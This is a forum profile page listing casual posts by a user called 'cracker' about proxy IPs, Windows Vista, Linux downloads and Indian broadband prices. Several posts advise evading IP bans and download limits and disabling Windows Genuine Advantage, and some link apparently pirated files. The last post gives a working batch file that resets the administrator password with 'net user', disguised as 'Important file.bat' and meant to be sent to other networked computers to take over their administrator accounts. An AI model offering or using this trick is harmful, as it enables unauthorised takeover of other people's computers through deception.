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Everything posted by cracker

  1. Using Fast Proxy Ip

    it is very difficult to get fast ip from www.publicproxyservers.com do u know any good site which provide fast proxy ips?
  2. All About Linux

    try this book http://rapidshare.de/files/2627591/For.Dum...y.2005.rar.html
  3. first visit microsoft update website and when u get msg invallid serial disable (windows genuine advantage) from add-ons
  4. Using Fast Proxy Ip

    or try http://www.hide-ip-soft.com/ it will make ur pc as proxy server but only works with i.e and it will change ur ip to proxy 1 it is very useful 4 those who av shared internet connection (to make rapidshare fool) or if ur ip get ban from any site
  5. Using Fast Proxy Ip

    is it that difficult?lol
  6. Using Fast Proxy Ip

    on i.e tools==>internet option==>connections==>setting==>(use a proxy server for this connection ) now enter ip and port
  7. it works easily with rconnect ur ip is ur web url download http://www.analogx.com/files/sswwwi.exe
  8. Using Fast Proxy Ip

    dude than u need fast proxy ip it increases the response time try
  9. Longhorn Becomes Windows Vista™

    download http://files.tcmagazine.info:80/windowsx/shrine/lhtrans/lhtrans.zip
  10. Longhorn Becomes Windows Vista™

    deepu who is ur fav dancer in media edition here is my fav
  11. All About Linux

    if any body want to download Mandrake Linux 10.1 i am giving its download link here Mandrake Linux 10.1 Official Full DVD use any link
  12. if u have more than 1 pc and only 1 is connected with internet and all r in network but if u want to share internet with all pc all u need this download http://www.analogx.com/files/proxyi.exe size 295.5kb
  13. Longhorn Becomes Windows Vista™

    i am happy with windows media edition
  14. Longhorn Becomes Windows Vista™

    this 1 is for enterprise edition for home edition it require 512mb ram 3.0ghz processor 80gb hdd + additional graphic memory
  15. Longhorn Becomes Windows Vista™

    here is 1 from desi pc my friend installed it today
  16. Gmail Now In Hindi Too

    Now that is the real innovation
  17. Should Reliance Reduce Prices?

    I still don't know why sify call it self sify broadband? When it comes to broadband I think speed should not be less than 512 kbps
  18. Should Reliance Reduce Prices?

    it is shared line but my friend is getting good speed (officially he is getting 64kbps speed but truth is he is getting 128 kbps) and they r also providing router with every connection here they r charging Rs2500 registration fee
  19. Gmail Now In Hindi Too

    Best of all no heavy loaded advertisement Like it is there in site like yahoo, hotmail, rediff etc
  20. Gmail Now In Hindi Too

    i know they r really doing great job
  21. Should Reliance Reduce Prices?

    Unlimited download They brought broadband in our area with agreement and J.V with local cable wala and they have fix tariff unlimited download (no other tariff 4 home user) And my friend is using it from last 2 month. He downloaded lots of stuff From net more of than 3gb But he got the monthly bill not more than Rs 500
  22. Google Talk

    use proxy ip
  23. Should Reliance Reduce Prices?

    Cracker, there is a daily download limit of 150 MB in this package during the day time. They deduct 1 day for every additional 25 MB that u downloadafter the limit of 150MB. from 10pm to 8am there is no restriction however. I am Check here for delhi tarrifs SifyBroadband tarrifs Delhi 40469[/snapback] dude in Mumbai ==> Vasai they r providing unlimited download @500 Rs no extra tax
  24. to change password in command net user administrator anyPassword bat file @net user @net user administrator anyPassword @stop save it as Important file.bat and send it to any computer in network and gain access to administrator account